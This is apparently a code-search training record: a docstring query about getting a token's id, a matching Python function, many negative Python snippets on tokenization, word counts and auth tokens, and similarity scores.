doc: ###############################################\n for word in doc:\n word = word.strip()\n if(c==1):\n if (word not in vocab):\n wordcountnone += 1\n if(i == str(word)):\n wordcount += 1\n #print(wordcount)\n if(wordcount > 0):\n bow[i] = wordcount\n wordcount = 0\n if(wordcountnone != 0):\n bow[None] = wordcountnone\n return bow", "def compute_tf(document):\r\n _len = len(document)\r\n tf_dict = {}\r\n for token in document:\r\n tf_dict.setdefault(token, 0.0)\r\n tf_dict[token] += 1 / _len\r\n\r\n return tf_dict", "def preprocess(document, max_features=150, max_sentence_len=300):\n\n def lemmatize(token, tag):\n \"\"\"\n Converts the tag to a WordNet POS tag, then uses that\n tag to perform an accurate WordNet lemmatization.\n \"\"\"\n tag = {\n 'N': wn.NOUN,\n 'V': wn.VERB,\n 'R': wn.ADV,\n 'J': wn.ADJ\n }.get(tag[0], wn.NOUN)\n\n return WordNetLemmatizer().lemmatize(token, tag)\n\n def vectorize(doc, max_features, max_sentence_len):\n \"\"\"\n Converts a document into a sequence of indices of length max_sentence_len retaining only max_features unique words\n \"\"\"\n tokenizer = Tokenizer(num_words=max_features)\n tokenizer.fit_on_texts(doc)\n doc = tokenizer.texts_to_sequences(doc)\n doc_pad = pad_sequences(doc, padding='pre', truncating='pre', maxlen=max_sentence_len)\n return np.squeeze(doc_pad), tokenizer.word_index\n\n cleaned_document = []\n vocab = []\n\n # Break the document into sentences\n for sent in document:\n\n # Clean the text using a few regular expressions\n sent = re.sub(r\"[^A-Za-z0-9^,!.\\/'+-=]\", \" \", sent)\n sent = re.sub(r\"what's\", \"what is \", sent)\n sent = re.sub(r\"\\'\", \" \", sent)\n sent = re.sub(r\"@\", \" \", sent)\n sent = re.sub(r\"\\'ve\", \" have \", sent)\n sent = re.sub(r\"can't\", \"cannot \", sent)\n sent = re.sub(r\"n't\", \" not \", sent)\n sent = re.sub(r\"i'm\", \"i am \", sent)\n sent = re.sub(r\"\\'re\", \" are \", sent)\n sent = re.sub(r\"\\'d\", \" would \", sent)\n sent = re.sub(r\"\\'ll\", \" will \", sent)\n sent = re.sub(r\"(\\d+)(k)\", r\"\\g<1>000\", sent)\n sent = sent.replace(\"\\n\", \" \")\n\n lemmatized_tokens = []\n\n # Break the sentence into part of speech tagged tokens\n for token, tag in pos_tag(wordpunct_tokenize(sent)):\n\n # Apply preprocessing to the tokens\n token = token.lower()\n token = token.strip()\n token = token.strip('_')\n token = token.strip('*')\n\n # If punctuation ignore token and continue\n if all(char in set(string.punctuation) for char in token) or token in set(sw.words('english')):\n continue\n\n # Lemmatize the token\n lemma = lemmatize(token, tag)\n lemmatized_tokens.append(lemma)\n vocab.append(lemma)\n\n cleaned_document.append(lemmatized_tokens)\n\n vocab = sorted(list(set(vocab)))\n\n return cleaned_document, vocab", "def get_counts(self):\n counts = {}\n for document in self.docs:\n for word in document:\n if word not in counts.keys():\n counts[word] = 1\n else:\n counts[word] += 1\n return counts", "def collocationFinder(document,nbest=4):\n\tchain = lambda x : list(itertools.chain(*pos.tokenize_words(pos.tokenize_sents(x))))\n\tstopset = set(stopwords.words('english'))\n\tfilter_stops = lambda w: len(w) < 3 or w in stopset\n\tbcf = BigramCollocationFinder.from_words(chain(document))\n\tbcf.apply_word_filter(filter_stops)\n\treturn bcf.nbest(BigramAssocMeasures.likelihood_ratio, 4)", "def compute_frequencies(num_words, documents):\n res = [0 for i in range(num_words)]\n sum = 0\n for word in documents:\n sum += 1\n tmp = set(word)\n for number in tmp:\n res[number] += 1\n \n res = [i / sum for i in res]\n return res", "def process_document(text):\n words = preprocess(text)\n postings = {}\n for word, ix in words:\n if word in postings:\n wordinfo = postings[word]\n else:\n wordinfo = {\"frequency\": 0, \"indexes\": []}\n postings[word] = wordinfo\n wordinfo[\"frequency\"] += 1\n wordinfo[\"indexes\"].append(ix)\n return postings", "def build_vocab(self, min_count=3):\n word2count = defaultdict(int)\n for sentence in self.tokenized_corpus:\n for word in sentence:\n word2count[word] += 1\n\n word2dict = {}\n word2dict['PAD'] = {'id': 0}\n word2dict['UNK'] = {'id': 1}\n for word in word2count:\n if word2count[word] >= min_count:\n word2dict[word] = {'id': len(word2dict), 'count': word2count[word]}\n self.vocab = word2dict", "def computeWordsFrequencies(self):\n token_stream = self._tokenize(self.readable)\n token_map = self._countTokens(token_stream)\n # print token_map.items()\n return sorted(token_map.items(), key = lambda x : x[1], reverse = True)", "def _create_dictionary(self, document):\n words = self._normalize_words(document.words)\n unique_words = frozenset(words)\n return dict((word, idx) for idx, word in enumerate(unique_words))", "def get_distribution(doc):\n word_count = {}\n word_count = clean(doc, word_count)\n factor = 1.0 / sum(word_count.values())\n dist = {k: v * factor for k, v in word_count.items()}\n return dist", "def getTokenCollectionFrequency(self, token):\n\n wordid = self.find_word_in_dictionary(token)\n # word is not in the dictionary\n if wordid == -1:\n print(\"Token is not in the dictionary\")\n return 0\n\n with open(self.word_to_docs_path, 'rb') as bin:\n while bin.tell() != os.fstat(bin.fileno()).st_size:\n # get wordid:\n wordid_in_file = int.from_bytes(bin.read(4), 'big')\n # get frequency:\n frequency = int.from_bytes(bin.read(4), 'big')\n # skip documents:\n int.from_bytes(bin.read(4 * frequency), 'big')\n if wordid_in_file == wordid:\n return frequency\n return 0", "def add(self, document):\n #words=[word.lower() for word in words if word.isalpha()] #added on 0415\n for token in [t.lower() for t in nltk.word_tokenize(document)]:\n if not token.isalpha():\n continue\n\n if token in self.stopwords:\n continue\n \n if self.stemmer:\n token = self.stemmer.stem(token)\n \n if self.__unique_id not in self.index[token]:\n self.index[token].append(self.__unique_id)\n \n self.documents[self.__unique_id] = document\n self.__unique_id += 1", "def createBagOfWords(df, n):\n from nltk.tokenize import word_tokenize\n from nltk.corpus import stopwords\n import string\n from collections import Counter\n from nltk.stem.porter import PorterStemmer\n \n ps = PorterStemmer()\n stop_words = set(stopwords.words('english') + list(string.punctuation) + ['...' , ',' , '“', '”', '.', 'fig', '.fig'])\n \n dfDict = {}\n# df['count'] = df.groupby('Text')['Text'].transform(pd.Series.value_counts)\n# df.sort_values('count', ascending = False)\n# df.drop('count', axis = 1)\n dfLength = len(df.index)\n for i in range(1, dfLength):\n text = df['Text'][i]\n if dfDict.__contains__(text):\n df['Text'][i] = dfDict.get(text)\n else:\n textModified = text.lower()\n textModified = textModified.replace(',', '')\n textModified = textModified.replace('.', '')\n textModified = textModified.split()\n textModified = [ps.stem(word) for word in textModified if not word in set(stop_words) and len(word) > 1]\n textModified = ' '.join(textModified)\n df['Text'][i] = textModified\n dfDict[text] = textModified\n \n from sklearn.feature_extraction.text import CountVectorizer\n cv = CountVectorizer()\n textBagOfWords = cv.fit_transform(df['Text']).toarray()\n textBagOfWords = pd.DataFrame(textBagOfWords)\n df = df.drop(['Text'], axis = 1)\n df = pd.concat([df, textBagOfWords], axis = 1)\n return df", "def doc2idx(self, document, unknown_word_index=-1):\n if isinstance(document, string_types):\n raise TypeError(\"doc2idx expects an array of unicode tokens on input, not a single string\")\n\n document = [word if isinstance(word, unicode) else unicode(word, 'utf-8') for word in document]\n return [self.token2id.get(word, unknown_word_index) for word in document]", "def bow(data_frame, description):\n text = list(data_frame['article'])\n vectorizer = CountVectorizer(stop_words='english') # create the transform\n vectorizer.fit(text) # tokenize and build vocab\n # save bow vectorizer as pickle\n with open('resources/bow_encoder_' + description + '.pkl', 'wb') as f:\n pickle.dump(vectorizer.vocabulary_, f)\n f.close()\n data_frame['bow'] = data_frame['article'].apply(lambda x: vectorizer.transform([x]))\n return data_frame", "def extract_features(document):\n document_words = set(document)\n features = {}\n global word_features\t\n for word in word_features:\n features['contains(%s)' % word] = (word in document_words)\n return features", "def q_tokenize(document):\n final_words = []\n avoided_words = [] # WORDS WHICH ARE TO BE AVOIDED IN THE FINAL LIST\n \n # making the avoided_words list\n for word in string.punctuation: # the string library has a string of punctuations\n avoided_words.append(word)\n for word in nltk.corpus.stopwords.words(\"english\"): # the nltk lib. has a list of stopwords commonly used in english\n avoided_words.append(word)\n\n tokens = nltk.word_tokenize(document)", "def wordbag( text, ignore_words = Ignore_words ) :\n iter = (stripword(s) for s in text.lower().split() if stripword(s) not in ignore_words)\n result = {}\n for x in iter :\n if result.has_key(x) :\n result[x] += 1\n else :\n result[x] = 1\n return result", "def bin_inscriptions(corpus):\n doc_bin = DocBin(attrs=[\"LEMMA\",\"TAG\",\"POS\",\"DEP\",\"HEAD\"], store_user_data=True)\n for c in corpus:\n doc = nlp(c)\n doc_bin.add(doc)\n\n with open('dbg.bin','wb') as f:\n f.write(doc_bin.to_bytes())", "def get_words(doc):\n splitter = re.compile('\\\\W*')\n # Split the words by non-alpha characters\n words = [s.lower() for s in splitter.split(doc) \n if len(s)>2 and len(s)<20]\n # Return the unique set of words only\n return dict([(w,1) for w in words])", "def get_document_complexe_tags(self, document):\n kw_extractor = yake.KeywordExtractor(lan=\"en\", n=3, top=30)\n keywords = kw_extractor.extract_keywords(document)\n\n complexe_tag = []\n for keyword in keywords:\n if keyword[-1] >= 0.1:\n break\n complexe_tag.append(keyword[0])\n return complexe_tag", "def get_terms(document):\n q = get_mapped(document)\n tokens = tockenizer(q)\n terms = analizer(tokens)\n\n return terms", "def get_word_frequencies(documents):\n cv_model = CountVectorizer(binary=True)\n tf_matrix = cv_model.fit_transform(documents)\n tf_matrix_transpose = tf_matrix.transpose()\n\n vocabulary = get_vocabulary(documents)\n n_words = len(vocabulary)\n\n word_frequency = {}\n word_frequency_in_documents = {}\n\n for word_idx in range(n_words):\n word = vocabulary[word_idx]\n tf_word = tf_matrix_transpose[word_idx]\n\n # getnnz -> Get the count of explicitly-stored values (nonzeros)\n word_frequency[word] = float(tf_word.getnnz(1))\n # nonzero -> Return the indices of the elements that are non-zero\n word_frequency_in_documents[word] = set(tf_word.nonzero()[1])\n\n return word_frequency, word_frequency_in_documents", "def getBiwords(self, words):\n bigrams_val = nltk.bigrams(words)\n biwords = []\n for word in bigrams_val:\n biwords.append(word)\n return biwords", "def pos_tag_counts(doc):\n tags = []\n for token in doc:\n tags.append(token.pos_)\n frequency = dict(Counter(tags).most_common()) \n return frequency", "def _create_word_count_dict(self):\n word_counts = dict()\n for wc in self.word_counts.all():\n word_counts[wc.word.name] = wc.count\n return word_counts", "def get_tokens(self, document):\n raise NotImplementedError()", "def entity_counts(doc):\n \n tags = []\n for token in doc.ents:\n tags.append(token.label_)\n frequency = dict(Counter(tags).most_common())\n\n return frequency", "def test_bigrams():\n tokenizer = Tokenizer(bigram_freq=0.5)\n X = tokenizer.transform([[\"a b a b\"]])\n assert X[\"corpus\"][0] == [\"a_b\", \"a_b\"]\n assert isinstance(tokenizer.bigrams, pd.DataFrame)", "def preprocess_corpus(corpus, stop_list, stop_words=True, stemm=True, bag_words=True):\n corpus_preprocessed = list()\n for element in corpus:\n new_element = dict()\n new_element['document'] = preprocess_document(element['text'], stop_list, stop_words, stemm, bag_words)\n new_element['id'] = element['id']\n corpus_preprocessed.append(new_element)\n\n return corpus_preprocessed", "def learn_word_vocab(self, word_counts: typing.Counter[str]) -> Dict[str, int]:\r\n for token in set(self.required_tokens or []):\r\n word_counts[token] = int(2 ** 31)\r\n word_counts[self.PAD] = int(2 ** 32) # Make sure that PAD gets id=0\r\n sorted_word_counts = sorted(word_counts.items(), key=lambda p: -p[1])\r\n return {word: idx for idx, (word, count) in enumerate(sorted_word_counts[: self.word_vocab_size])}", "def clean_docs(self,docs):\n\n # Remove numbers, but not words that contain numbers.\n docs = [[token for token in doc if not token.isnumeric()] for doc in docs]\n\n # Remove words that are only one character.\n docs = [[token for token in doc if len(token) > 1 and token not in stop_words] for doc in docs]\n\n # lemmatizer = WordNetLemmatizer()\n # docs = [[lemmatizer.lemmatize(token) for token in doc] for doc in docs]\n\n # Add bigrams and trigrams to docs (only ones that appear 20 times or more).\n bigram = Phrases(docs, min_count=20)\n for idx in range(len(docs)):\n for token in bigram[docs[idx]]:\n if '_' in token:\n # Token is a bigram, add to document.\n docs[idx].append(token)\n\n # Create a dictionary representation of the documents.\n dictionary = Dictionary(docs)\n\n # Filter out words that occur less than 20 documents, or more than 50% of the documents.\n dictionary.filter_extremes(no_below=20, no_above=0.5)\n\n # Bag-of-words representation of the documents.\n corpus = [dictionary.doc2bow(doc) for doc in docs]\n\n return docs,dictionary,corpus", "def extractWordFeatures(x):\n # BEGIN_YOUR_CODE (around 5 lines of code expected)\n a = Counter(x.split())\n return dict(a)\n # END_YOUR_CODE", "def readDocument(self, filename, voc):\n f = open(filename, encoding=\"utf8\")\n text = f.read()\n f.close()\n table = str.maketrans(self.punct, \" \" * len(self.punct))\n text = text.translate(table)\n # Start with all zeros\n bow = np.zeros(len(voc))\n for w in text.split():\n # If the word is the vocabulary...\n if w in voc:\n # ...increment the proper counter.\n index = voc[w]\n bow[index] += 1\n return bow", "def features_extract(document, wordset):\n words_doc = nltk.FreqDist(document)\n features = []\n for word in wordset:\n features.append(words_doc[word])\n return features", "def vectorize_doc_simple(self, doc):\n\n bow = defaultdict(float)\n tokens = [token.lower() for token in doc.split()]\n for token in tokens:\n bow[token] += 1.0\n return bow", "def word_tag_counts (count_file):\r\n wordtagcounts = defaultdict(list)\r\n f = open(count_file, 'r')\r\n for line in f:\r\n fields = line.split(\" \")\r\n if fields[1] != 'WORDTAG':\r\n continue\r\n count = int(fields[0].strip())\r\n tag = fields[2].strip()\r\n word = fields[3].strip()\r\n wordtagcounts[word].append((tag, count)) \r\n f.close() \r\n return wordtagcounts", "def get_feature_set_SB(tweet):\n #pos-tag frequencies\n# print \"Tagged words in tweet: \", tweet.tagged_words\n pos_tag_freq = {}\n additional_freq = {}\n for phrase in tweet.tagged_words:\n for word in phrase:\n try:\n tag = word['pos']\n pos_tag_freq[tag] = pos_tag_freq.get(tag, 0) + 1\n# if tag=='PRtinf':\n# pos_tag_freq[tag] = pos_tag_freq.get(tag, 0) + 1\n# elif tag=='ADJS':\n# pos_tag_freq[tag] = pos_tag_freq.get(tag, 0) + 1\n# elif tag=='ADJ':\n# pos_tag_freq[tag] = pos_tag_freq.get(tag, 0) + 1\n# elif tag=='NP':\n# pos_tag_freq[tag] = pos_tag_freq.get(tag, 0) + 1\n# elif tag=='DET':\n# pos_tag_freq[tag] = pos_tag_freq.get(tag, 0) + 1\n# elif tag=='P':\n# pos_tag_freq[tag] = pos_tag_freq.get(tag, 0) + 1\n if tag in ADJECTIVES:\n additional_freq['adjectives'] = additional_freq.get(tag, 0) + 1\n elif tag in ADVERBS: \n additional_freq['adverbs'] = additional_freq.get(tag, 0) + 1\n elif tag in PRONOUNS:\n additional_freq['pronoun'] = 1\n except KeyError:\n continue\n# print \"Tag frequencies: \", pos_tag_freq\n for key in pos_tag_freq.keys():\n pos_tag_freq[key] = pos_tag_freq[key]*1.0\n #number of adjectives in sentence, number of adverbs in sentence(except ikke), pronoun in sentence(binary) \n #Number of exclamation marks, number of emoticons,\n emoticons = tweet.nrof_happyemoticons+tweet.nrof_sademoticons\n if emoticons>0:\n additional_freq['emoticons'] = emoticons*1.0\n if tweet.nrof_exclamations>0:\n additional_freq['exclamations'] = tweet.nrof_exclamations*1.0\n \n# print \"Additional frequencies: \", additional_freq\n# raw_input(\"Continue?\")\n \n #Concatenate the dicts\n features= dict(pos_tag_freq.items() + additional_freq.items())\n# print \"All features: \", features\n# raw_input(\"Continue?\")\n return features", "def convert_corpus_to_lists(corpus_data):\r\n global ne_tags_set\r\n\r\n res_lsts = []\r\n for sent in corpus_data.iob_sents():\r\n if not sent:\r\n continue\r\n words, nes = [], []\r\n for tup in sent:\r\n words.append(tup[0])\r\n nes.append(tup[2])\r\n ne_tags_set.update(nes)\r\n res_lsts.append({'words': words, 'nes': nes})\r\n\r\n return res_lsts", "def count_words(data, number_word_frequency_results=40):\n current_max_sentence_size = 0\n count_word_frequency = Counter()\n for entry in data:\n print (entry)\n terms_all = [term for term in entry]\n count_word_frequency.update(terms_all)\n return count_word_frequency.most_common(number_word_frequency_results)", "def create_tag_list(faker_obj, num=10):\n fake = faker_obj\n return fake.words(nb=num)", "def _get_bag_of_pos(words, index, N, target_len=1):\n bos = DummyWord(pos=utils.BEGIN_OF_SENTENCE, upos=utils.BEGIN_OF_SENTENCE, dependency_relation=utils.BEGIN_OF_SENTENCE)\n eos = DummyWord(pos=utils.END_OF_SENTENCE, upos=utils.END_OF_SENTENCE, dependency_relation=utils.END_OF_SENTENCE)\n words = [bos] * N + words + [eos] * N\n index += N\n return [_get_word_feature(w) for w in words[index-N:index] + [words[index]] + words[index+target_len:index+target_len+N]]", "def bow2tfidf(doc_term_bow, corpus_tfidf):\n doc_term_tfidf = corpus_tfidf[doc_term_bow]\n scipy_tfidf = corpus2csc(doc_term_tfidf, num_terms = len(corpus_tfidf.idfs))\n tfidf_mtx = csc_matrix(scipy_tfidf).T.toarray()\n# print(f'The dimensions of tfidf matrix = {tfidf_mtx.shape}')\n return tfidf_mtx" ]
[ "0.75598925", "0.67602545", "0.64582515", "0.63520515", "0.5917524", "0.5897528", "0.58469146", "0.5783915", "0.5782803", "0.5771413", "0.57590044", "0.5732742", "0.5720406", "0.57064784", "0.5675183", "0.5654374", "0.5644353", "0.5635149", "0.55853426", "0.5584801", "0.5566225", "0.555628", "0.5548173", "0.55473787", "0.55292", "0.5528124", "0.55213606", "0.5471837", "0.54674333", "0.54658204", "0.54527575", "0.54523855", "0.5438297", "0.5417862", "0.5413706", "0.54040253", "0.5393506", "0.5389471", "0.5383417", "0.53788805", "0.5368723", "0.5363487", "0.53555876", "0.5347967", "0.53432435", "0.5330719", "0.53218395", "0.5309028", "0.528517", "0.52717644", "0.52702236", "0.5257687", "0.5254924", "0.525368", "0.5250891", "0.52507746", "0.52481055", "0.5242255", "0.52340275", "0.52294236", "0.52251196", "0.5202333", "0.5201033", "0.51958776", "0.5184707", "0.5184477", "0.5180649", "0.5178058", "0.5173469", "0.51715237", "0.5165607", "0.5163354", "0.51611555", "0.5160638", "0.5151979", "0.51505786", "0.51467514", "0.5138188", "0.5129542", "0.5125597", "0.51245016", "0.5117293", "0.5112767", "0.51117134", "0.51110995", "0.5109514", "0.5105078", "0.50954574", "0.5092957", "0.5082291", "0.5079884", "0.50798035", "0.507229", "0.50709724", "0.5067233", "0.5066023", "0.50621605", "0.50613314", "0.50601083", "0.50592107" ]
0.6443913
3
Get the token_id of given token.
def token_to_id(self, token): token = self.process_token(token) return self.token2id.get(token, len(self.token2id) - 1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def token_to_id(self, token):\n token = self.process_token(token)\n return self._token2id.get(token, len(self._token2id) - 1)", "def token_to_id(self, token):\r\n return self.encoder.get(token, self.encoder.get(self.unk_token))", "def token_id(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"token_id\")", "def map_token_to_id(self, token: str):\n if token not in self._token_to_id:\n token = self._unk_token\n return self._token_to_id[token]", "def token_id(self) -> pulumi.Output[int]:\n return pulumi.get(self, \"token_id\")", "def _convert_token_to_id(self, token):\n return self.vocab.get(token, self.vocab.get(self.unk_token))", "def _convert_token_to_id(self, token):\n return self.sp_model.PieceToId(str(token))", "def _convert_token_to_id(self, token):\n return self.sp_model.PieceToId(token)", "def _convert_token_to_id(self, token):\n if token in self.fairseq_tokens_to_ids:\n return self.fairseq_tokens_to_ids[token]\n spm_id = self.sp_model.PieceToId(token)\n\n # Need to return unknown token if the SP model returned 0\n return spm_id + self.fairseq_offset if spm_id else self.unk_token_id", "def get_token(self, token_id):\n raise exception.NotImplemented() # pragma: no cover", "def try_get_user_id_from_token(token):\n dot_index = token.find('.')\n if (dot_index > 0):\n token_base64 = token[:dot_index]\n \n try:\n token_string = b64decode(token_base64)\n except Base64DecodeError:\n user_id = 0\n else:\n try:\n user_id = int(token_string)\n except ValueError:\n user_id = 0\n else:\n user_id = 0\n \n return user_id", "def token(cls, token):\n user_db = User.get_by('token', token)\n if not user_db:\n raise ValueError('Sorry, your token is either invalid or expired.')\n return token", "def get_token(self):\n token = self._session.token\n return token", "def get_user_id(jwt_token):\n return (\n jwt_token.payload[\"user\"].get(\"id\")\n if jwt_token.payload.get(\"user\")\n else jwt_token.payload[\"session_id\"]\n )", "def token(self):\n return self[\"token\"]", "def LookupToken(self, dmtoken):\n self.ReadClientStateFile()\n return self._registered_tokens.get(dmtoken, None)", "def _get_auth_token(self):\n\n __logger__.debug(\"Getting auth Token\")\n return self.keystone_client.auth_ref['token']['id']", "def vpp_token_id(self):\n if \"vppTokenId\" in self._prop_dict:\n return self._prop_dict[\"vppTokenId\"]\n else:\n return None", "def get_token(self):\n token_model = TokenModel.find_by_user_id(self.id)\n return token_model.token if token_model else None", "def verify_token(self, token: str) -> str:\n return decode(self.rd.hget(\"auth:by_token\", token))", "def get_token_id(self):\n return f\"{self.document_title}_{self.index}\"", "def get_current_uid():\n # TODO: Find a better way to access the token\n return request.token['id']", "def get_token(self):\n\n return self._token", "def get_token(self):\n return self.__token", "def get_token(self):\n return self.__token", "def get(uid: int, token_id: int):\n\n token = Token.get(uid, token_id).as_dto().to_primitive()\n\n if token:\n return token.to_primitive()\n else:\n raise NotFound(\"Token Not Found\")", "def token(self) -> str:\n return pulumi.get(self, \"token\")", "def token(self) -> str:\n return pulumi.get(self, \"token\")", "def token(self) -> str:\n return pulumi.get(self, \"token\")", "def token():\n return os.environ.get('TOKEN', None)", "def token(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"token\")", "def token(self):\n return self._token", "def token(self):\n return self._token", "def token(self):\n return self._token", "def spotify_id_from_token(access_token: str) -> Optional[str]:\n if access_token is None:\n return None\n headers = {\"Authorization\": \"Bearer {}\".format(access_token)}\n response = requests.post(\"https://api.spotify.com/v1/me\", headers=headers)\n if response.status_code != 200:\n return None\n user = response.json()\n if \"id\" not in user:\n return None\n return user[\"id\"]", "async def get_user_id(conn, login=None, token=None):\n if login:\n query = db.users.select().where(db.users.c.login == login)\n user = await conn.fetch(query)\n if len(user) == 0:\n return None\n else:\n query = db.users.select().where(db.users.c.token == token)\n user = await conn.fetch(query)\n return user[0]['id']", "def token(self):\r\n return self._token", "async def get_user_token(\n token: Optional[str] = None,\n x_token: Optional[str] = Header(None),\n authorization: Optional[str] = Header(None),\n sessiontoken: Optional[str] = Cookie(None),\n) -> Optional[str]:\n if token:\n return token\n if x_token:\n return x_token\n if authorization and authorization.startswith(\"Bearer \"):\n return authorization[7:]\n if sessiontoken:\n return sessiontoken\n return None", "def token(self):\n\n if not self.requests:\n return None\n return self.requests[0].token", "def get_jwt_identity(self) -> Optional[Union[str,int]]:\n if self._TOKEN:\n return self._verified_token(encoded_token=self._TOKEN)['identity']\n return None", "def _handle_token(self, token: str) -> Optional[str]:\n return token or self._token_handler.token", "def verify_token(token):\n return AuthToken.query.filter_by(auth_token=token).first()", "def getToken(self):\n query = \"SELECT token FROM token WHERE id = 1\"\n res = self.db.execute(query).fetchone()\n if res:\n return res[0]\n return False", "def getToken():\n token = getenv(TOKEN_NAME)\n if token == None:\n raise SystemExit('No token found. Use env variable %s' % TOKEN_NAME)\n return token", "def get_token(self, tid):\n if self.lliagraph:\n return self.lliagraph.get_token(tid)\n else:\n return None", "def token_id_hex(self) -> str: # this is *ALSO* a MINT property\n return self.token_id.hex()", "def _get_token(self):\n return user.get_token()", "def decode_token(token):\n payload = None\n try:\n payload = jwt.decode(token.encode('utf-8'), '1$Arh\"1bWa/7+OS', algorithm='HS256')['u_id']\n except jwt.InvalidTokenError:\n pass\n return payload", "def id(self, tokens):\n if len(tokens) != 1:\n raise Exception(\"Unexpected argument counts\")\n return tokens[0].value", "def get_token():\n params = {'get_token': 'get_token'}\n return load_page(API, params=params, headers={'content-type': 'application/json'})['token']", "def get_token(self, token_file: str = 'token') -> str:\n token = ''\n with open(self.path(token_file), 'r') as file:\n tokens = file.read().split('\\n')\n # Loop over all tokens in the file\n for t in tokens:\n # Check if name of token matches name of bot\n if self.name in t:\n token = t.split(' ')[1]\n return token", "def _handle_token(self, token: str) -> Optional[str]:\n return token", "def get_token(self, organization_id: int, provider: str) -> str | None:\n sentry_app_installation_tokens = self.select_related(\"api_token\").filter(\n sentry_app_installation__sentryappinstallationforprovider__organization_id=organization_id,\n sentry_app_installation__sentryappinstallationforprovider__provider=provider,\n )\n if not sentry_app_installation_tokens:\n return None\n\n return sentry_app_installation_tokens[0].api_token.token", "def _get_token(token=None):\n if token is not None:\n return token\n else:\n return os.environ.get(\"MAPBOX_ACCESS_TOKEN\") or os.environ.get(\n \"MapboxAccessToken\"\n )", "def find_auth_token(document_html):\n search_result = re.search(AUTH_TOKEN_REGEX, document_html)\n if search_result:\n return search_result.group('auth_token')", "def identifier(self) -> str:\n return self.current_token", "def token(self) -> Optional[str]:\n return self._builder._token", "def get_username_from_token(self, token):\n dataBase = self.read_database()\n if token in dataBase['sessions']:\n userName = dataBase['sessions'][token]['userName']\n return userName\n else:\n raise InvalidTokenException(\"Token not valid.\")", "def get_token():\n return session.get('microsoft_token')", "def get_token():\n return session.get('microsoft_token')", "def decode_token(token):\n try:\n # try to decode the token using our SECRET variable\n payload = jwt.decode(token, app.config.get('SECRET_KEY'), algorithms=['HS256'])\n return payload['sub']\n except jwt.ExpiredSignatureError:\n # the token is expired, return an error string\n return \"Expired token. Please login to get a new token\"\n except jwt.InvalidTokenError:\n # the token is invalid, return an error string\n return \"Invalid token. Please register or login\"", "def decode_token(token):\n try:\n payload = jwt.decode(\n token, app.config.get('SECRET_KEY'), algorithms='HS256')\n return payload['sub']\n except jwt.ExpiredSignatureError:\n return \"Expired token. Please login to get a new token\"\n except jwt.InvalidTokenError:\n return \"Invalid token. Please register or login\"", "def get(self, token):\n args = (token, )\n row = self.db_manager.execute_sql_and_fetchone(SQL_TOKEN_GET, args)\n if row:\n token_object = convert_db_row_to_dict(row, TOKEN_MODEL_FIELDS)\n else:\n token_object = {}\n return token_object", "def decode_token(token):\n try:\n # Decode token with our secret key\n payload = jwt.decode(token, SECRET_KEY)\n return payload['sub']\n except jwt.ExpiredSignatureError:\n # token has expired\n return \"Timed out. Please login to get a new token\"\n except jwt.InvalidTokenError:\n return \"Invalid token. Please register or login\"", "def find_token_for_authorization(authorization):\n return None", "def get_token(filename='config.ini'):\n cp = ConfigParser()\n cp.read(filename)\n token = cp.get('githubapi', 'token')\n return token", "def token_key(token):\n morphotagged = analysis(token).get('raw')\n lemma_pos = (analysis(token).get('lemma'), analysis(token).get('partOfSpeech'))\n return morphotagged or lemma_pos", "def check_token(token):\n return conn.hget('login:', token)", "def map_id_to_token(self, id: int):\n return self._id_to_token[id]", "def get_token(self):\n if not self.is_valid():\n logger.warn(\"TokenWall form data is not valid.\")\n return None\n \n tt = self.cleaned_data['token']\n logger.debug(\"Looking for token '%s'\"%tt)\n return Token.objects.get(value=tt)", "def get_token_auth_header():\n auth = request.headers.get(\"Authorization\", None)\n if not auth:\n return \"authorization_header_missing\"\n\n parts = auth.split()\n\n if parts[0].lower() != \"bearer\":\n return \"invalid_header\"\n elif len(parts) == 1:\n return \"invalid_header\"\n elif len(parts) > 2:\n return \"invalid_header\"\n\n token = parts[1]\n return token", "def token(self):\n print(\"getter of token called\")\n return self._token", "def get_auth_token():\n if CFG.auth_enabled:\n auth_token = get_keystone_token()\n else:\n auth_token = 'notrealtoken'\n\n return auth_token", "def token(self):\n if not self._token:\n self._token = self.authenicate().token\n\n return self._token", "def validate_token(self, token):\n from expfactory.database.models import Participant\n\n p = Participant.query.filter(Participant.token == token).first()\n if p is not None:\n if p.token.endswith((\"finished\", \"revoked\")):\n p = None\n else:\n p = p.id\n return p", "def get_token_auth_header():\n auth = request.headers.get(\"Authorization\", None)\n if not auth:\n raise AuthError({\"code\": \"authorization_header_missing\",\n \"description\":\n \"Authorization header is expected\"}, 401)\n\n parts = auth.split()\n\n if parts[0].lower() != \"bearer\":\n raise AuthError({\"code\": \"invalid_header\",\n \"description\":\n \"Authorization header must start with\"\n \" Bearer\"}, 401)\n elif len(parts) == 1:\n raise AuthError({\"code\": \"invalid_header\",\n \"description\": \"Token not found\"}, 401)\n elif len(parts) > 2:\n raise AuthError({\"code\": \"invalid_header\",\n \"description\":\n \"Authorization header must be\"\n \" Bearer token\"}, 401)\n\n token = parts[1]\n return token", "async def token(request: Request):\n return get_token()", "def token(self):\n\n return self.__token", "def validate_token(self, token):\n\n try:\n if not token:\n raise AuthException(\"Needed a token or Authorization HTTP header\", http_code=HTTPStatus.UNAUTHORIZED)\n\n # try to get from cache first\n now = time()\n token_info = self.token_cache.get(token)\n if token_info and token_info[\"expires\"] < now:\n # delete token. MUST be done with care, as another thread maybe already delete it. Do not use del\n self.token_cache.pop(token, None)\n token_info = None\n\n # get from database if not in cache\n if not token_info:\n token_info = self.db.get_one(\"tokens\", {\"_id\": token})\n if token_info[\"expires\"] < now:\n raise AuthException(\"Expired Token or Authorization HTTP header\", http_code=HTTPStatus.UNAUTHORIZED)\n\n return token_info\n\n except DbException as e:\n if e.http_code == HTTPStatus.NOT_FOUND:\n raise AuthException(\"Invalid Token or Authorization HTTP header\", http_code=HTTPStatus.UNAUTHORIZED)\n else:\n raise\n except AuthException:\n if self.config[\"global\"].get(\"test.user_not_authorized\"):\n return {\"id\": \"fake-token-id-for-test\",\n \"project_id\": self.config[\"global\"].get(\"test.project_not_authorized\", \"admin\"),\n \"username\": self.config[\"global\"][\"test.user_not_authorized\"], \"admin\": True}\n else:\n raise\n except Exception:\n self.logger.exception(\"Error during token validation using internal backend\")\n raise AuthException(\"Error during token validation using internal backend\",\n http_code=HTTPStatus.UNAUTHORIZED)", "def _parse_token(self, body):\n\n token_match = re.search('var\\s*token\\s*=[\\s\\']*(\\d+)', body)\n return int(token_match.group(1))", "def get_current_pub_key(token: str = 